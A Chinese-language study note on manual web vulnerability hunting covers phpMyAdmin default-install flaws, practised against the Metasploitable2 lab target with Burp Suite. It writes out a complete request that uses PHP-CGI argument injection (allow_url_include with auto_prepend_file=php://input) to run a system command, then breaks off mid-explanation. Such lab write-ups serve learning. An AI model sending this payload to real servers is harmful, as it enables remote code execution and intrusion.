手动漏洞挖掘(一)
学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。
—— phpMyAdmin默认安装漏洞——
需要的工具:
- burpsuit
- 靶机(我选择的是Metasploitable2)
phpMyAdmin漏洞
安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。
1.我们可以探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫描工具/手动爬网)
2.可以尝试../phpMyAdmin/setup
目录是否可以访问【可以不需要身份认证的情况下,对服务器进行配置】
一.利用漏洞重放数据
首先在burpsuite的Repeater输入以下代码:
POST
http://192.168.52.130/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.20.10
<?php
passthru('id');
die();
?>
代码的意思是
?-d+allow_url_include%3d1±d
+auto_prepend_file%3dphp://input HTTP/1.1
“?”后面代码含义:PHP的主配置文件.ini进行修改
allow_url_include: 对服